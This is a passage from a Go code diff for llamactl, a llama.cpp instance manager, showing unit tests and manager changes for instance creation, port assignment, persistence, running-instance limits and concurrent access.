_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := inst.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := manager.NewInstanceManager(cfg)
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, inst := range instances {
names[inst.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
// Create temporary directory for persistence
tempDir := t.TempDir() tempDir := t.TempDir()
cfg := config.InstancesConfig{ cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000}, PortRange: [2]int{8000, 9000},
InstancesDir: tempDir, InstancesDir: tempDir,
MaxInstances: 10, MaxInstances: 10,
TimeoutCheckInterval: 5,
} }
manager := manager.NewInstanceManager(cfg)
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
// Create instance _, err := manager1.CreateInstance("test-instance", options)
_, err := manager.CreateInstance("test-instance", options)
if err != nil { if err != nil {
t.Fatalf("CreateInstance failed: %v", err) t.Fatalf("CreateInstance failed: %v", err)
} }
@@ -522,359 +72,102 @@ func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
t.Errorf("Expected persistence file %s to exist", expectedPath) t.Errorf("Expected persistence file %s to exist", expectedPath)
} }
// Verify file contains correct data // Test loading instances from disk
data, err := os.ReadFile(expectedPath) manager2 := manager.NewInstanceManager(cfg)
instances, err := manager2.ListInstances()
if err != nil { if err != nil {
t.Fatalf("Failed to read persistence file: %v", err) t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
} }
var persistedInstance map[string]interface{} // Test port map populated from loaded instances (port conflict should be detected)
if err := json.Unmarshal(data, &persistedInstance); err != nil { _, err = manager2.CreateInstance("new-instance", options) // Same port
t.Fatalf("Failed to unmarshal persisted data: %v", err) if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
} }
if persistedInstance["name"] != "test-instance" { // Test file deletion on instance deletion
t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"]) err = manager2.DeleteInstance("test-instance")
}
}
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Create instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
_, err = manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
// Verify persistence file was updated
expectedPath := filepath.Join(tempDir, "test-instance.json")
data, err := os.ReadFile(expectedPath)
if err != nil {
t.Fatalf("Failed to read persistence file: %v", err)
}
var persistedInstance map[string]interface{}
if err := json.Unmarshal(data, &persistedInstance); err != nil {
t.Fatalf("Failed to unmarshal persisted data: %v", err)
}
// Check that the options were updated
options_data, ok := persistedInstance["options"].(map[string]interface{})
if !ok {
t.Fatal("Expected options to be present in persisted data")
}
if options_data["model"] != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
}
}
func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Create instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
expectedPath := filepath.Join(tempDir, "test-instance.json")
// Verify file exists
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Fatal("Expected persistence file to exist before deletion")
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil { if err != nil {
t.Fatalf("DeleteInstance failed: %v", err) t.Fatalf("DeleteInstance failed: %v", err)
} }
// Verify file was deleted
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) { if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted") t.Error("Expected persistence file to be deleted")
} }
} }
func TestPersistence_InstancesLoadedFromDisk(t *testing.T) { func TestConcurrentAccess(t *testing.T) {
tempDir := t.TempDir() mgr := createTestManager()
defer mgr.Shutdown()
// Create JSON files manually (simulating previous run) // Test concurrent operations
instance1JSON := `{ var wg sync.WaitGroup
"name": "instance1", errChan := make(chan error, 10)
"running": false,
"options": {
"model": "/path/to/model1.gguf",
"port": 8080
}
}`
instance2JSON := `{ // Concurrent instance creation
"name": "instance2", for i := range 5 {
"running": false, wg.Add(1)
"options": { go func(index int) {
"model": "/path/to/model2.gguf", defer wg.Done()
"port": 8081
}
}`
// Write JSON files
err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
// Create manager - should load instances from disk
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Verify instances were loaded
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
}
// Check instances by name
instancesByName := make(map[string]*instance.Process)
for _, inst := range instances {
instancesByName[inst.Name] = inst
}
instance1, exists := instancesByName["instance1"]
if !exists {
t.Error("Expected instance1 to be loaded")
} else {
if instance1.GetOptions().Model != "/path/to/model1.gguf" {
t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
}
if instance1.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
}
}
instance2, exists := instancesByName["instance2"]
if !exists {
t.Error("Expected instance2 to be loaded")
} else {
if instance2.GetOptions().Model != "/path/to/model2.gguf" {
t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
}
if instance2.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
}
}
}
func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
tempDir := t.TempDir()
// Create JSON file with specific port
instanceJSON := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}`
err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
// Create manager - should load instance and register port
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Try to create new instance with same port - should fail due to conflict
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
Model: "/path/to/model2.gguf", LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080, // Same port as loaded instance
},
}
_, err = manager.CreateInstance("new-instance", options)
if err == nil {
t.Error("Expected error for port conflict with loaded instance")
}
if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Create first manager and instance with comprehensive options
manager1 := manager.NewInstanceManager(cfg)
autoRestart := false
maxRestarts := 10
restartDelay := 30
originalOptions := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
CtxSize: 4096,
GPULayers: 32,
Temperature: 0.7,
TopK: 40,
TopP: 0.9,
Verbose: true,
FlashAttn: false,
Lora: []string{"adapter1.bin", "adapter2.bin"},
HFRepo: "microsoft/DialoGPT-medium",
}, },
} }
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions) // Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil { if err != nil {
t.Fatalf("CreateInstance failed: %v", err) t.Fatalf("CreateInstance failed: %v", err)
} }
// Create second manager (simulating restart) - should load the instance // Shutdown should not panic
manager2 := manager.NewInstanceManager(cfg) mgr.Shutdown()
loadedInstance, err := manager2.GetInstance("roundtrip-test") // Multiple shutdowns should not panic
if err != nil { mgr.Shutdown()
t.Fatalf("GetInstance failed after reload: %v", err)
}
// Compare all data
if loadedInstance.Name != originalInstance.Name {
t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
}
originalOpts := originalInstance.GetOptions()
loadedOpts := loadedInstance.GetOptions()
// Compare restart options
if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
}
if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
}
if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
}
// Compare llama server options
if loadedOpts.Model != originalOpts.Model {
t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
}
if loadedOpts.Port != originalOpts.Port {
t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
}
if loadedOpts.Host != originalOpts.Host {
t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
}
if loadedOpts.CtxSize != originalOpts.CtxSize {
t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
}
if loadedOpts.GPULayers != originalOpts.GPULayers {
t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
}
if loadedOpts.Temperature != originalOpts.Temperature {
t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
}
if loadedOpts.TopK != originalOpts.TopK {
t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
}
if loadedOpts.TopP != originalOpts.TopP {
t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
}
if loadedOpts.Verbose != originalOpts.Verbose {
t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
}
if loadedOpts.FlashAttn != originalOpts.FlashAttn {
t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
}
if loadedOpts.HFRepo != originalOpts.HFRepo {
t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
}
// Compare slice fields
if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
}
// Verify created timestamp is preserved
if loadedInstance.Created != originalInstance.Created {
t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
}
} }
// Helper function to create a test manager with standard config // Helper function to create a test manager with standard config
@@ -887,6 +180,7 @@ func createTestManager() manager.InstanceManager {
DefaultAutoRestart: true, DefaultAutoRestart: true,
DefaultMaxRestarts: 3, DefaultMaxRestarts: 3,
DefaultRestartDelay: 5, DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
} }
return manager.NewInstanceManager(cfg) return manager.NewInstanceManager(cfg)
} }

View File

@@ -2,12 +2,15 @@ package manager
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/validation" "llamactl/pkg/validation"
"os" "os"
"path/filepath" "path/filepath"
) )
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager. // ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) { func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
@@ -27,10 +30,6 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance options cannot be nil") return nil, fmt.Errorf("instance options cannot be nil")
} }
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
name, err := validation.ValidateInstanceName(name) name, err := validation.ValidateInstanceName(name)
if err != nil { if err != nil {
return nil, err return nil, err
@@ -44,29 +43,27 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
im.mu.Lock() im.mu.Lock()
defer im.mu.Unlock() defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists // Check if instance with this name already exists
if im.instances[name] != nil { if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name) return nil, fmt.Errorf("instance with name %s already exists", name)
} }
// Assign a port if not specified // Assign and validate port for backend-specific options
if options.Port == 0 { if err := im.assignAndValidatePort(options); err != nil {
port, err := im.getNextAvailablePort() return nil, err
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
} }
inst := instance.NewInstance(name, &im.instancesConfig, options) statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst im.instances[inst.Name] = inst
im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil { if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err) return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -108,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
} }
// Check if instance is running before updating options // Check if instance is running before updating options
wasRunning := instance.Running wasRunning := instance.IsRunning()
// If the instance is running, stop it first // If the instance is running, stop it first
if wasRunning { if wasRunning {
@@ -146,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name) return fmt.Errorf("instance with name %s not found", name)
} }
if instance.Running { if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name) return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
} }
delete(im.ports, instance.GetOptions().Port) delete(im.ports, instance.GetPort())
delete(im.instances, name) delete(im.instances, name)
// Delete the instance's config file if persistence is enabled // Delete the instance's config file if persistence is enabled
@@ -167,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) { func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
instance, exists := im.instances[name] instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock() im.mu.RUnlock()
if !exists { if !exists {
return nil, fmt.Errorf("instance with name %s not found", name) return nil, fmt.Errorf("instance with name %s not found", name)
} }
if instance.Running { if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name) return instance, fmt.Errorf("instance with name %s is already running", name)
} }
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil { if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err) return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
} }
@@ -190,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil return instance, nil
} }
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it. // StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) { func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock() im.mu.RLock()
@@ -199,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists { if !exists {
return nil, fmt.Errorf("instance with name %s not found", name) return nil, fmt.Errorf("instance with name %s not found", name)
} }
if !instance.Running { if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name) return instance, fmt.Errorf("instance with name %s is already stopped", name)
} }
@@ -239,3 +252,49 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic // TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil return fmt.Sprintf("Logs for instance %s", name), nil
} }
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}

View File

@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
